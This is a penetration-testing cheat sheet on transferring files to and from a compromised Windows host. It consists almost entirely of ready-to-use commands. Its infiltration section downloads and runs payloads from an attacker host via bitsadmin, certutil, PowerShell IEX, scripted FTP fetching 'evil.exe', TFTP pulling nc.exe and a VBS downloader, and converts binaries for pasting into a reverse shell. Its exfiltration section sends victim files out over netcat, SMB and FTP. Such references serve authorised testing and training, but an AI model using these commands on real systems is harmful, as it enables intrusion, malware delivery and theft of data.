File transfer

In case of physical access think about USB port, direct Wi-Fi, Bluetooth and SD card

Listeners

Windows
nc -lvp <port> < <file>
Linux

https://cs.piosky.fr/post-exploit/linux/file_transfer/#listeners

Infiltration - Downloaders

SMB
\\<ip>\<share>\<file>
copy \\<ip>\<share>\<file> <file>
Sysinternals
bitsadmin /transfer mydownloadjob /download /priority normal <http://attackerIP/executable.exe> <C:\\Users\\%USERNAME%\\AppData\\local\\temp\\executable.exe>
certutil.exe -urlcache -split -f <URL> <output.file>
certutil.exe -encode <original_file> <b64encoded_file>
certutil.exe -decode <file.txt> <file.exe>
Executables
notepad.exe <url>
PowerShell
(New-Object System.Net.WebClient).DownloadFile("<http://server/file.txt>", "<C:\Windows\Temp\file.txt>") 
Invoke-WebRequest "<http://server/file.txt>" -OutFile "<C:\Windows\Temp\file.txt>"
$browser = New-Object System.Net.WebClient;
$browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX($browser.DownloadString('<http://server/file.txt>'));
echo $storageDir = $pwd > get.ps1
echo $webclient = New-Object System.Net.WebClient >> get.ps1
echo $url = "<url>" >> get.ps1
echo $file = "<filename>" >> get.ps1
echo $webclient.DownloadFile($url,$file) >> get.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1
FTP
echo open <attackerip> 21> ftp.txt
echo USER <username> <password> >> ftp.txt
echo bin >> ftp.txt
echo GET <evil.exe> >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
TFTP

In Kali

service atftpd start
atftpd --daemon --port 69 /tftp
/etc/init.d/atftpd restart
auxiliary/server/tftp

In RSH
Enable TFTP

pkgmgr /iu:"TFTP"
tftp -i <ip_target> GET <nc.exe>
VBS

unix2dos before copying it

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs <url> <out_file>
Debug.exe

The file to upload must be under the 64K limit

upx -9 <file.exe>
/usr/share/windows-binaries/exe2bat.exe <file.exe> <file.txt>

Then copy paste in your reverse shell to create the file on the target.

Exfiltration

If not mentionned, the first CLI is from victim and the second from Kali

copy <file> \\<ip>\<share>\

smbserver.py <share> .
nc <ip> <port> < <file>

nc -lvp <port> > <file> 
echo open <ip> > ftp.bat
echo <user> >>ftp.bat
echo <pass> >>ftp.bat
echo binary >>ftp.bat
echo mput <C:\Users\user\desktop\test.txt> >>ftp.bat
echo quit >>ftp.bat

ftp -i -s:.\ftp.bat